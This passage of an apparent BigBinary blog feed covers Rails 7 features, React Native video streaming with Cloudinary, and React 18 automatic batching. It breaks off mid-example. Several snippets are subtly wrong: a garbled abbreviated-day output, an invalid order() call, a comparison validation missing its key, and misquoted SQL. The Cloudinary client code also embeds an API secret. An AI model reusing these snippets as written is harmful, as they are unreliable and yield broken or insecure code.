value=\&quot;Saturday\&quot;&gt;Saturday&lt;/option&gt;&quot;</code></pre><p><code>index_as_value</code> defaults to false and if true it will set the value of eachoption to the index of that day.</p><pre><code class="language-html">&lt;!-- weekday_options_for_select(index_as_value: true) --&gt;&lt;option value=\&quot;0\&quot;&gt;Sunday&lt;/option&gt;\n&lt;option value=\&quot;1\&quot;&gt;Monday&lt;/option&gt;\n&lt;option value=\&quot;2\&quot;&gt;Tuesday&lt;/option&gt;\n&lt;option value=\&quot;3\&quot;&gt;Wednesday&lt;/option&gt;\n&lt;option value=\&quot;4\&quot;&gt;Thursday&lt;/option&gt;\n&lt;option value=\&quot;5\&quot;&gt;Friday&lt;/option&gt;\n&lt;option value=\&quot;6\&quot;&gt;Saturday&lt;/option&gt;&quot;</code></pre><p><code>day_format</code> defaults to :day_names and passing this a different <code>I18n</code> key willuse different formats for the option display names and their values.</p><pre><code class="language-html">&lt;!-- weekday_options_for_select(day_format: :abbr_day_names) --&gt;&lt;option value=\&quot;Sun\&quot;&gt;Sun&lt;/option&gt;\n&lt;option value=\&quot;Mon\&quot;&gt;Mon&lt;/option&gt;\n&lt;option value=\&quot;Tue\&quot;&gt;Tue&lt;/option&gt;\n&lt;option value=\&quot;We\&quot;&gt;Wedn&lt;/option&gt;\n&lt;option value=\&quot;Thu\&quot;&gt;Thu&lt;/option&gt;\n&lt;option value=\&quot;Fri\&quot;&gt;Fri&lt;/option&gt;\n&lt;option value=\&quot;Sat\&quot;&gt;Sat&lt;/option&gt;&quot;</code></pre><p>Note that <code>:abbr_day_names</code> options are built into Rails, but we can define yourarray.</p><p>Check out this <a href="https://github.com/rails/rails/pull/42979">pull request</a> formore details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds ActiveRecord::Base#previously_persisted?]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-activerecord-previously_persisted"/>
      <updated>2021-11-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-activerecord-previously_persisted</id>
      <content type="html"><![CDATA[<p><a href="https://api.rubyonrails.org/v6.1.4/classes/ActiveRecord/Persistence.html">Active Record</a>in Rails provides various methods like <code>exists?</code>, <code>persisted?</code>, <code>destroyed?</code> andmany more. Using these methods we can easily determine if an object exists inthe database or if an object is an existing record in the database and not a newrecord.</p><p>Using these methods we can quickly determine the state of an object and easilywrite complex conditional statements that depend on the state of an object.Previously we did not have a method that lets us determine if an object was apart of the database in past but now does not exist.</p><p>However,<a href="https://github.com/rails/rails/pull/42389">Rails 7 has added previously_persisted? method to ActiveRecord</a>,which returns <code>true</code> if an object has been previously a part of the databaserecords but now has been destroyed.</p><p>Lets assume we have a <code>User</code> model with the name column value <code>John Doe</code>. Ifthis record has been deleted from the database, we can still check if <code>John Doe</code>was a user of our app or not in the past.</p><h3>Before</h3><p>Let's say we delete the user with the name <code>John Doe</code>.</p><pre><code class="language-ruby"># app/controllers/user_controller.rbprevious_user = User.find_by_name('John Doe')previous_user.destroy!</code></pre><p>Now we can check if the user exists in our database.</p><pre><code class="language-ruby"># app/controllers/user_controller.rb# check if previous_user is destroyed and is not a new userif previous_user.destroyed? &amp;&amp; !previous_user.new_record?  # returns trueend</code></pre><h3>Rails 7 onwards</h3><p>We can use the <code>previously_persisted?</code> method on an object.</p><p>Let's delete the user with the name <code>John Doe</code>.</p><pre><code class="language-ruby"># app/controllers/user_controller.rbprevious_user = User.find_by_name('John Doe')previous_user.destroy!</code></pre><p>Now we can check if the user exists in our database using the<code>previously_persisted?</code> method.</p><pre><code class="language-ruby"># app/controllers/user_controller.rbprevious_user.previously_persisted? # returns true</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/42389">pull request</a> formore details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds ActiveRecord::QueryMethods#in_order_of]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-activerecord-query-methods-in-order-of"/>
      <updated>2021-11-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-activerecord-query-methods-in-order-of</id>
      <content type="html"><![CDATA[<p>Rails 7 introduces<a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/QueryMethods.html#method-i-in_order_of">ActiveRecord::QueryMethods#in_order_of</a>to fetch active record collection in a specific order based on the givenattribute values.</p><p>We can see the similar method available for <code>Enumerable#in_order_of</code> toconstrain records in a specific order from an enumerable collection by usingkey-series pair. You can find more details here in<a href="https://www.bigbinary.com/blog/rails-7-adds-enumerable-in-order-of">our blog</a>regarding <code>Enumerable#in_order_of</code> method.</p><p>The newly introduced method is highly helpful to build queries by which we canspecify an explicit order that we would like to get the collection as result.Otherwise we will have to make custom <code>CASE</code> statements to specify the order inraw SQL statement format.</p><pre><code class="language-ruby"># Fetch Post records in order of [3, 5, 1]SELECT &quot;posts&quot;.* FROM &quot;posts&quot; ORDER BY CASE &quot;posts&quot;.&quot;id&quot; WHEN 3 THEN 1 WHEN 5 THEN 2 WHEN 1 THEN 3 ELSE 4 END ASC</code></pre><h3>Before</h3><p>Suppose we have a <code>Course</code> model with <code>status</code> column having possible valueslike <code>enrolled</code>, <code>started</code> &amp; <code>completed</code>. If we want to fetch all course recordsas a collection with status values in order of <code>started</code>, <code>enrolled</code> &amp;<code>completed</code>, then the only option here is to build the <code>CASE</code> statement as rawSQL. Otherwise we will have to make iterations over the returned result tomodify in the specific order we wish to get back.</p><pre><code class="language-ruby">Course.order(  Arel.sql(    %q(      case status      when 'started' then 1      when 'enrolled' then 2      when 'completed' then 3      else 4 end    )  ))</code></pre><h3>Rails 7 onwards</h3><p>The <code>ActiveRecord::QueryMethods#in_order_of</code> method will prepare either <code>CASE</code>statement or will make use of built-in function (Eg: <code>FIELD</code> in MySQL) based onthe adapter to perform the specified order.</p><pre><code class="language-ruby">Course.in_order_of(:status, %w(started enrolled completed))</code></pre><p>The returned result here is an <code>ActiveRecord::Relation</code> object, unlike the resultfor <code>Enumerable#in_order_of</code> where it is an array. Henc,e we can chain otherscopes or query methods with the result while using<code>ActiveRecord::QueryMethods#in_order_of</code> method.</p><pre><code class="language-ruby">Course.in_order_of(:status, %w(started enrolled completed)).order(:created_at: :desc).pluck(:name)</code></pre><p>Please check out this <a href="https://github.com/rails/rails/pull/42061">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds disable_joins for associations]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-disable-joins-for-associations"/>
      <updated>2021-10-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-disable-joins-for-associations</id>
      <content type="html"><![CDATA[<p>Rails 7 introduces <code>disable_joins</code> for database associations to avoid joinerrors in multi-tenant applications where the two tables are located indifferent database clusters.</p><p>Rails commonly performs lazy loading while fetching records for better efficiencyand internally build join queries to fetch the records faster.</p><p>But when we deal with different database clusters within the same application,the lazy loading nature of Active Record causes errors when the databases can'tperform join queries between different clusters.</p><p>As a resolution for this, Rails 7 has newly added 'disable_joins' option to tellRails upfront that queries must be performed without joining tables. Inthis case two or more queries will be generated and used to fetch the resultsfrom different database clusters.</p><p>The <code>disable_joins</code> option is available for both <code>has_many :through</code> and<code>has_one :through</code> associations. In some cases, if order or limit is applied, itwill be performed in-memory due to database limitations.</p><pre><code class="language-ruby">class Employee  has_many :projects  has_many :tasks, through: :projects, disable_joins: trueendclass Project  belongs_to :employee  has_many :tasksendclass Task  belongs_to :projectend</code></pre><p>Before Rails 7, <code>@employee.tasks</code> without <code>disable_joins</code> option will raiseerror because database clusters can't handle join queries here. If we providethe <code>disable_joins</code> option as true (by default, the value is set to false) thenRails will make two or more separate queries to fetch the results from differentdatabase clusters.</p><pre><code class="language-sql">SELECT &quot;project&quot;.&quot;id&quot; FROM &quot;projects&quot; WHERE &quot;projects&quot;.&quot;employee_id&quot; = ? [[&quot;employee_id&quot;, 1]]SELECT &quot;tasks&quot;.* FROM &quot;tasks&quot; WHERE &quot;tasks&quot;.&quot;project_id&quot; IN (?, ?, ?) [[&quot;project_id&quot;, 1], [&quot;project_id&quot;, 2], [&quot;project_id&quot;, 3]]</code></pre><p>Similarly, for has_one through association:</p><pre><code class="language-ruby">class Publisher  has_one :author  has_one :book, through: :author, disable_joins: trueendclass Author  belongs_to :publisher  has_one :bookendclass Book  belongs_to :authorend</code></pre><p>The <code>@publisher.book</code> will make the following two queries to fetch the results.</p><pre><code class="language-sql">SELECT &quot;author&quot;.&quot;id&quot; FROM &quot;authors&quot; WHERE &quot;authors&quot;.&quot;publisher_id&quot; = ? [[&quot;publisher_id&quot;, 1]]SELECT &quot;books&quot;.* FROM &quot;books&quot; WHERE &quot;books&quot;.&quot;author_id&quot; = ? [[&quot;author_id&quot;, 1]]</code></pre><p>Please be aware that enabling this option without realizing the actual need willresult in performance implications since two or more queries are performed here.Also queries with order or limit will be done in-memory since the order from onedatabase can't be applied to another database query.</p><p>Please check out the <code>disable_joins</code> pull requests for<a href="https://github.com/rails/rails/pull/41937">has_many through</a> &amp;<a href="https://github.com/rails/rails/pull/42079">has_one through</a> associations formore details and discussions.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds the ability to use pre-defined variants]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-ability-to-use-predefined-variants"/>
      <updated>2021-10-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-ability-to-use-predefined-variants</id>
      <content type="html"><![CDATA[<p>Rails 5.2 introduced<a href="https://guides.rubyonrails.org/active_storage_overview.html">ActiveStorage</a>which made it possible to easily upload files to a cloud storage service likeAmazon S3, Google Cloud Storage, or Microsoft Azure Storage. It also helped inattaching the files to active record objects.</p><p>Using <code>ActiveStorage</code> and <a href="https://www.imagemagick.org">ImageMagick</a> we cantransform image uploads and extract metadata from files. For transforming imageuploads we can use <a href="https://www.imagemagick.org">image_processing</a> gem with<code>ActiveStorage</code> and create variants of an image.</p><p>Previously for creating image variants, we needed to use<a href="https://www.imagemagick.org">image_processing</a> gem with <code>ActiveStorage</code>processor. The default processor for <code>ActiveStorage</code> is <code>MiniMagick</code>, but we canalso use <a href="https://www.rubydoc.info/gems/ruby-vips/Vips/Image">Vips</a>.</p><p>However,<a href="https://github.com/rails/rails/pull/39135">Rails 7 has added the ability to use pre-defined variants</a>which provides a way to easily create variants for images.</p><p>Let's assume we have a model <code>Blog</code>. Using <code>has_one_attched</code> every record canhave one file attached to it.</p><pre><code class="language-ruby"># app/models/blog.rbclass Blog &lt; ApplicationRecord  has_one_attached :display_picture # Setup mapping between record and fileend</code></pre><p>To create a <code>blog</code> with an attachment on <code>display_picture</code>.</p><pre><code class="language-ruby"># app/views/blogs/new.html.erb&lt;%= form.file_field :avatar %&gt;</code></pre><pre><code class="language-ruby"># app/controllers/blogs_controller.rbclass BlogsController &lt; ApplicationController  def create    blog = Blog.create!(blog_params)    session[:user_id] = blog.id    redirect_to root_path  end  private    def blog_params      params.require(:blog).permit(:title, :display_picture)    endend</code></pre><h3>Before</h3><p>If we want to create variants of <code>display_picture</code>, we need to add the<a href="https://www.imagemagick.org">image_processing</a> gem to the <code>Gemfile</code>.</p><pre><code class="language-ruby"># project_folder/Gemfilegem 'image_processing'</code></pre><p>Then, to create variants of the image, we can call the <code>variant</code> method on theattachment record.</p><pre><code class="language-ruby"># app/views/blogs/show.html.erb&lt;%= image_tag blog.display_picture.variant(resize_to_limit: [100, 100]) %&gt;</code></pre><h3>Rails 7 onwards</h3><p>We can use the <code>variants</code> option on <code>has_one_attached</code>.</p><pre><code class="language-ruby">class Blog &lt; ActiveRecord::Base  has_one_attached :display_picture, variants: {    thumb: { resize: &quot;100x100&quot; },    medium: { resize: &quot;300x300&quot; }  }end</code></pre><p>To display we can use the <code>variant</code> method.</p><pre><code class="language-ruby"># app/views/blogs/show.html.erb&lt;%= image_tag blog.display_picture.variant(:thumb) %&gt;</code></pre><p><code>variants</code> can also be used on <code>has_many_attached</code>. Check out this<a href="https://github.com/rails/rails/pull/39135">pull request</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds setting for enumerating columns in select statements]]></title>
       <author><name>Ashik Salman</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-setting-for-enumerating-columns-in-select-statements"/>
      <updated>2021-10-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-setting-for-enumerating-columns-in-select-statements</id>
      <content type="html"><![CDATA[<p>Rails 7 has introduced a new setting called<code>enumerate_columns_in_select_statements</code> for enumerating columns in ActiveRecordselect query statements by which we can avoid common<a href="https://apidock.com/rails/ActiveRecord/PreparedStatementCacheExpired">ActiveRecord::PreparedStatementCacheExpired</a>errors.</p><p>Rails uses prepared statements for database query efficiency. When preparedstatements are being used, the repeated queries will be cached based on theprepared statement query plan at the Postgres database level. This cached value willbecome invalid when the returned results are changed.</p><p>Whenever we make any schema changes to the database tables while the application isrunning, the cached select statements with a wildcard column definition will raise<code>PreparedStatementCacheExpired</code> error since the query output has modified.</p><h3>Before</h3><pre><code class="language-ruby">=&gt; User.limit(10)=&gt; SELECT * FROM users LIMIT 10</code></pre><p>If we use the select query with <code>*</code>, then any change in the database schema forthe particular table (eg: users) will invalidate the prepared statement cacheand result in the <code>PreparedStatementCacheExpired</code> error. The solution here is tomention the columns explicitly in the select statement as shown below:</p><pre><code class="language-ruby">=&gt; SELECT &quot;first_name,last_name,email ...&quot; FROM users LIMIT 10</code></pre><h3>Rails 7 onwards</h3><p>Rails 7 adds a new setting by which we can ensure all select statements aregenerated by enumerating the columns explicitly. Hence, any modifications to thedatabase schema won't result in <code>PreparedStatementCacheExpired</code>, instea,d theprepared statements will be changed and the respective query will be cachedfreshly by the Postgres database.</p><p>We can either configure the setting for all models or at a specific model level.</p><pre><code class="language-ruby"># config/application.rbmodule MyApp  class Application &lt; Rails::Application    config.active_record.enumerate_columns_in_select_statements = true  endend# User model specificclass User &lt; ApplicationRecord  self.enumerate_columns_in_select_statements = trueend</code></pre><p>When the setting value is set to <code>true</code> the select statement will alwayscontains columns explicitly.</p><pre><code class="language-ruby">=&gt; User.limit(10)=&gt; SELECT &quot;first_name,last_name,email ...&quot; FROM users LIMIT 10</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/41718">pull request</a> formore details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Reducing memory bloat of a Ruby on Rails application]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/reducing-memory-bloat-in-a-ruby-on-rails-application"/>
      <updated>2021-10-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/reducing-memory-bloat-in-a-ruby-on-rails-application</id>
      <content type="html"><![CDATA[<p>Recently, we encountered that one of our internal products had started consumingtoo much memory. Some of our team members dug deep into it and resolved theissue. After the issue was resolved, Unni made a video for internal purposes. Inthis blog, we are posting that video as it was recorded.</p><p>&lt;iframe width=&quot;100%&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/pEFUS6beuow&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds ComparisonValidator to ActiveRecord]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-comparison-validator-to-active-record"/>
      <updated>2021-10-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-comparison-validator-to-active-record</id>
      <content type="html"><![CDATA[<p>Rails<a href="https://guides.rubyonrails.org/active_record_validations.html">Active Record Validation</a>provides a convenient way to validate the state of an object before it is storedin the database. There are various built-in<a href="https://guides.rubyonrails.org/active_record_validations.html">Active Record validations</a>like <code>presence</code>, <code>length</code>, <code>numericality</code> and <code>uniqueness</code>.</p><p>By using<a href="https://guides.rubyonrails.org/active_record_validations.html#numericality">numericality validator</a>,we can validate an attribute to only have numeric values.</p><pre><code class="language-ruby"># app/models/blog.rbclass Blog &lt; ApplicationRecord  validates :likes, numericality: trueend</code></pre><p>We can also use helpers like <code>greater_than</code>, <code>greater_than_or_equal_to</code>,<code>equal_to</code>, <code>less_than</code>, <code>less_than_or_equal_to</code>, <code>other_than</code>, <code>odd</code>, <code>even</code>with<a href="https://guides.rubyonrails.org/active_record_validations.html#numericality">numericality validator</a>but these work only on numbers.</p><pre><code class="language-ruby"># app/models/blog.rbclass Blog &lt; ApplicationRecord  validates :likes, numericality: { greater_than: 1 }end</code></pre><p>Previously for validating comparisons of dates, we needed to write<a href="https://guides.rubyonrails.org/active_record_validations.html#performing-custom-validations">custom validators</a>or use a gem like <a href="https://github.com/codegram/date_validator">date_validator</a>.</p><p>However,<a href="https://github.com/rails/rails/pull/40095">Rails 7 has added ComparisonValidator</a>which provides a way to easily validate comparisons with another value, proc, orattribute. Let's assume we have a model <code>Blog</code> with an <code>end_date</code> attribute.</p><h3>Before</h3><p>If we want to validate the <code>end_date</code> attribute for the provided value or thenwe would need to write a<a href="https://guides.rubyonrails.org/active_record_validations.html#performing-custom-validations">custom validator</a>or use a gem like <a href="https://github.com/codegram/date_validator">date_validator</a>.</p><pre><code class="language-ruby"># Using date_validator gemclass Blog &lt; ApplicationRecord  # validate against provided value  validates :end_date, date: { after: Proc.new { Date.today } }  # validate against another attribute  validates :end_date, date: { after: :start_date }end</code></pre><h3>Rails 7 onwards</h3><p>We can use <a href="https://github.com/rails/rails/pull/40095">ComparisonValidator</a> tovalidate the comparison of the <code>end_date</code> attribute for a provided value.</p><pre><code class="language-ruby">class Blog &lt; ApplicationRecord  # validate against provided value  validates_comparison_of :end_date, greater_than: -&gt; { Date.today }  # validate against another attribute  validates :end_date, greater_than: :start_dateend</code></pre><p><a href="https://github.com/rails/rails/pull/40095">ComparisonValidator</a> also provideshelpers like <code>greater_than</code>, <code>greater_than_or_equal_to</code>, <code>equal_to</code>,<code>less_than</code>, <code>less_than_or_equal_to</code> and <code>other_than</code>.</p><p>Check out this <a href="https://github.com/rails/rails/pull/40095">pull request</a> formore details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7 adds ActiveRecord::Relation#structurally_compatible?]]></title>
       <author><name>Gaurav Varma</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-adds-active-record-relation-structurally-compatible"/>
      <updated>2021-09-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-adds-active-record-relation-structurally-compatible</id>
      <content type="html"><![CDATA[<p><a href="https://guides.rubyonrails.org/active_record_querying.html">ActiveRecord</a> isone of the most powerful features in Rails. With <code>ActiveRecord</code> we can easilyquery and handle database objects without writing any SQL.</p><p>By using <code>ActiveRecord Query Interface</code>, we can perform various query operationslike <code>Joins</code>, <code>Group</code>, <code>Find</code>, <code>Order</code>. We can also chain relations with<code>where</code>, <code>and</code>, <code>or</code>, <code>not</code> but for <code>and</code> or <code>or</code> the two chaining relationsmust be structurally compatible.</p><p>For any two relations to be<a href="https://github.com/rails/rails/blob/c577657f6de64b743b12a21108dc9cc5cfc35098/activerecord/lib/active_record/relation/query_methods.rb#L650">Structurally Compatible</a>they must be scoping the same model, and they must differ only by the <code>where</code>clause when no <code>group</code> clause has been defined. If a <code>group</code> clause is present,then the relations must differ by the <code>having</code> clause. Also, neither relationmay use a <code>limit</code>, <code>offset</code>, or <code>distinct</code> method.</p><p>Previously for <code>and</code> or <code>or</code> query methods, we needed to make sure that the tworelations are structurally compatible otherwise, <code>ActiveRecord</code> would raise anerror.</p><p>However,<a href="https://github.com/rails/rails/pull/41841">Rails 7 has added ActiveRecord::Relation#structurally_compatible?</a>which provides a method to easily tell if two relations are structurallycompatible. We can use this method before we run <code>and</code> or <code>or</code> query methods onany two relations.</p><p>Let's assume we have two models, <code>Blog</code> and <code>Post</code>, with the following relations</p><pre><code class="language-ruby"># app/models/blog.rbclass Blog &lt; ApplicationRecord  has_many :postsend</code></pre><pre><code class="language-ruby"># app/models/post.rbclass Post &lt; ApplicationRecord  belongs_to :blogend</code></pre><h3>Before</h3><p>If we run <code>or</code> query between incompatible relations, we would get anArgumentError.</p><pre><code class="language-ruby">relation_1 = Blog.where(name: 'bigbinary blog')relation_2 = Blog.joins(:posts).where(posts: { user_id: current_user.id})begin  relation_1.or(relation_2)rescue ArgumentError  # Rescue ArgumentErrorend</code></pre><h3>Rails 7 onwards</h3><p>We can check the structural compatibility of the two relations.</p><pre><code class="language-ruby">relation_1 = Blog.where(name: 'bigbinary blog')relation_2 = Blog.where(user_id: current_user.id)if relation_1.structurally_compatible?(relation_2) # returns true  relation_1.or(relation_2)end</code></pre><p>Check out this <a href="https://github.com/rails/rails/pull/41841/files">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Playing videos in React Native]]></title>
       <author><name>Chirag Bhaiji</name></author>
      <link href="https://www.bigbinary.com/blog/playing-videos-in-react-native-using-cloudinary"/>
      <updated>2021-09-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/playing-videos-in-react-native-using-cloudinary</id>
      <content type="html"><![CDATA[<p>These days, a large number of mobile apps allow users to upload videos and playthose videos efficiently. While building these features in a React Native app, weran into some challenges. In this blog, we will discuss those challenges and thesolutions.</p><h2>Where to host the videos</h2><p>Since we are dealing with video,s we need a service that will store, host, encodeand be a CDN. After looking at various service providers, we decided to go with<a href="https://cloudinary.com/">Cloudinary</a>. Cloudinary is a service provider with anend-to-end image/video-management solution for web and mobile applications,covering everything from <strong><em>uploads, storage, manipulations, optimizations todelivery</em></strong> with a fast content delivery network (<strong><em>CDN</em></strong>).</p><h3>Setting up react-native-video player</h3><p>We decided to use<a href="https://github.com/react-native-video/react-native-video">react-native-video</a><code>v5.1.1</code> for playing videos in React Native application. Here is the<a href="https://github.com/react-native-video/react-native-video#readme">guide</a> to setup the video player.</p><pre><code class="language-jsx">import Video from &quot;react-native-video&quot;;const Player = ({ uri }) =&gt; {  return (    &lt;SafeAreaView style={styles.container}&gt;      &lt;Video        style={styles.player}        source={{ uri }}        controls        resizeMode=&quot;contain&quot;      /&gt;    &lt;/SafeAreaView&gt;  );};</code></pre><p>The above code snippet works perfectly on iOS but not on Android. On Android, wefaced a<a href="https://github.com/react-native-video/react-native-video/issues/1032">known issue</a>where the video doesn't play, but the audio plays with significant delay. Thisissue can be resolved by setting<a href="https://developer.android.com/guide/topics/media/exoplayer">exoplayer</a> as thedefault player for Android in <code>react-native.config.js</code> in the root directory ofthe project.</p><pre><code class="language-js">module.exports = {  dependencies: {    &quot;react-native-video&quot;: {      platforms: {        android: {          sourceDir: &quot;../node_modules/react-native-video/android-exoplayer&quot;,        },      },    },  },};</code></pre><h3>Setting up Cloudinary</h3><p>A Cloudinary account is required before proceeding. Once the account isready, following are the steps to enable unsigned upload for the account.</p><ul><li>Go to the <em>Settings</em> of Cloudinary.</li><li>Select the <em>Upload</em> tab.</li><li>Search for <em>Upload presets</em> section.</li><li>Click on <em>Enable unsigned uploading</em>.</li></ul><p>This generates an upload preset with a random name, which will be required forthe unsigned upload.</p><h2>Setting up Client for Upload</h2><h3>Selecting Video from the gallery</h3><p>We decided to use<a href="https://github.com/ivpusic/react-native-image-crop-picker">react-native-image-crop-picker</a><code>v0.36.2</code> library to select the video from the gallery. Here is the<a href="https://github.com/ivpusic/react-native-image-crop-picker#readme">guide</a> forsetting it up.</p><pre><code class="language-jsx">import ImagePicker from &quot;react-native-image-crop-picker&quot;;const selectVideo = ({ setVideoToUpload }) =&gt; {  ImagePicker.openPicker({ mediaType: &quot;video&quot; })    .then(setVideoToUpload)    .catch(console.error);};</code></pre><h3>Uploading Video</h3><pre><code class="language-js">// Cloud Name: Found on the Dashboard of Cloudinary.const URL = &quot;https://api.cloudinary.com/v1_1/&lt;CLOUD_NAME&gt;/video/upload&quot;;// Random Name: Generated After Enabling The Unsigned Uploading.const UPLOAD_PRESET = &quot;&lt;UPLOAD_PRESET_FOR_UNSIGNED_UPLOAD&gt;&quot;;const uploadVideo = (fileInfo, onSuccess, onError) =&gt; {  const { name, uri, type } = fileInfo;  let formData = new FormData();  if (uri) {    formData.append(&quot;file&quot;, { name, uri, type });    formData.append(&quot;upload_preset&quot;, UPLOAD_PRESET);  }  axios    .post(URL, formData, {      headers: { &quot;Content-Type&quot;: &quot;multipart/form-data&quot; },    })    .then(res =&gt; onSuccess(res.data))    .catch(error =&gt; onError(error));};export default { uploadVideo };</code></pre><h3>Fetching Videos on client</h3><pre><code class="language-js">import base64 from &quot;base-64&quot;;// API Key and Secret: Found on the Dashboard of Cloudinary.const API_KEY = &quot;&lt;API_KEY&gt;&quot;;const API_SECRET = &quot;&lt;API_SECRET&gt;&quot;;const URL = `https://api.cloudinary.com/v1_1/&lt;CLOUD_NAME&gt;/resources/video`;const getVideos = (onRes, onError) =&gt; {  axios    .get(URL, {      headers: {        Authorization: base64.encode(`${API_KEY}:${API_SECRET}`),      },    })    .then(res =&gt; onRes(res.data.resources))    .catch(error =&gt; onError(error));};export default { getVideos };</code></pre><p>Response:</p><pre><code class="language-json">{  &quot;resources&quot;: [    {      &quot;asset_id&quot;: &quot;475675ddd87cb3bb380415736ed1e3dc&quot;,      &quot;public_id&quot;: &quot;samples/elephants&quot;,      &quot;format&quot;: &quot;mp4&quot;,      &quot;version&quot;: 1628233788,      &quot;resource_type&quot;: &quot;video&quot;,      &quot;type&quot;: &quot;upload&quot;,      &quot;created_at&quot;: &quot;2021-08-06T07:09:48Z&quot;,      &quot;bytes&quot;: 38855178,      &quot;width&quot;: 1920,      &quot;height&quot;: 1080,      &quot;access_mode&quot;: &quot;public&quot;,      &quot;url&quot;: &quot;http://res.cloudinary.com/do77lourv/video/upload/v1628233788/samples/elephants.mp4&quot;,      &quot;secure_url&quot;: &quot;https://res.cloudinary.com/do77lourv/video/upload/v1628233788/samples/elephants.mp4&quot;    }    //...  ]}</code></pre><h3>Transforming uploaded videos for faster delivery</h3><p>One way to play a video is to first completely download the video on theclient's device and then play it locally. The biggest drawback of this approachis that it could take a long time before the video is fully downloaded and tillthen the device is not playing anything at all. This strategy also requires asophisticated algorithm to manage memory.</p><p>Another solution is to use<a href="https://en.wikipedia.org/wiki/Adaptive_bitrate_streaming">Adaptive Bitrate Streaming</a>(ABS)for playing videos. As the name suggests in this case, the video is beingstreamed. It is one of the most efficient ways to deliver videos based on theclient's internet bandwidth and device capabilities.</p><p>To generate ABS, we add an eager transformation to the upload preset we createdwhile setting up the Cloudinary account earlier.</p><p>An eager transformation runs automatically for all the videos uploaded using theupload preset which has the transformation added.</p><h3>Setup Transformation</h3><p>Here are the steps for adding an eager transformation to the upload preset.</p><ul><li>Go to the upload preset that was generated when the unsigned upload wasenabled while setting up Cloudinary in the earlier section.</li><li>Click on edit.</li><li>Go to the Upload Manipulations section.</li><li>Click on <code>Add Eager Transformation</code> to open the Edit Transaction window.</li><li>Open the <code>Format</code> dropdown under the <code>Format &amp; shape</code> section and select<code>M3U8 Playlist (HLS)</code>.</li><li>Select any streaming profile from the dropdown under the <code>More options</code>. Anyprofile matching your maximum required quality can be selected here.</li></ul><p>Next upload a video with the same preset, trigger the transformation to generateThe <code>M3U8</code> format, which is the one we need for playing the videos as streams.</p><h3>Consuming video streams</h3><p>To play streams, the <code>type</code> property must be provided to the<code>react-native-video</code>'s source prop. In this case, <code>type</code> will be <code>m3u8</code>. Also,the URI needs to be updated with this same extension.</p><pre><code class="language-diff">- source={{ uri }}+ source={{ uri: uri.replace(`.${format}`, '.m3u8'), type: 'm3u8'}}</code></pre><h3>Conclusion</h3><p>Once all the above mentioned steps were performed, we were able to uploadand stream videos on both iOS and Android without any issues.</p>]]></content>
    </entry><entry>
       <title><![CDATA[React 18 introduces Automatic Batching]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/react-18-introduces-automatic-batching"/>
      <updated>2021-07-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/react-18-introduces-automatic-batching</id>
      <content type="html"><![CDATA[<p>Earlier versions of React batched multiple state updates only inside React eventhandlers like <code>click</code> or <code>change</code> to avoid multiple re-renders and improveperformance.</p><p>React 18 adds automatic batching for all use cases to improve performance evenfurther. Now, React batches state updates in React events handlers, promises,setTimeout, native event handlers and so on.</p><p>Let's jump into an example to understand different use cases of batching.</p><p>In these examples we are assuming that you already replaced <code>render</code> with<code>createRoot</code> API. Automatic batching only works with <code>createRoot</code> API. Pleasecheck <a href="https://github.com/reactwg/react-18/discussions/5">this discussion</a> tolearn more about replacing <code>render</code> with <code>createRoot</code>.</p><p>We're using simplest example, also used in the<a href="https://github.com/reactwg/react-18/discussions/21">original discussion</a> ofthis change.</p><h3>React event handlers</h3><pre><code class="language-jsx">const App = () =&gt; {  const [count, setCount] = useState(0);  const [flag, setFlag] = useState(false);  const handleClick = () =&gt; {    setCount(count + 1);    setFlag(!flag);  };  return (    &lt;div&gt;      &lt;button onClick={handleClick}&gt;Click here!&lt;/button&gt;      &lt;h1&gt;{count}&lt;/h1&gt;      &lt;h1&gt;{`${flag}`}&lt;/h1&gt;    &lt;/div&gt;  );};</code></pre><p>Note - React automatically batched all state updates inside event handlers evenin previous versions.</p><h3>After fetch call</h3><pre><code class="language-jsx">const handleClick = () =&gt; {  fetch(&quot;URL&quot;).then(() =&gt; {    setCount(count + 1);    setFlag(!flag);  });};</code></pre><h3>In <code>setTimeout</code></h3><pre><code class="language-jsx">const handleClick = () =&gt; {  setTimeout(() 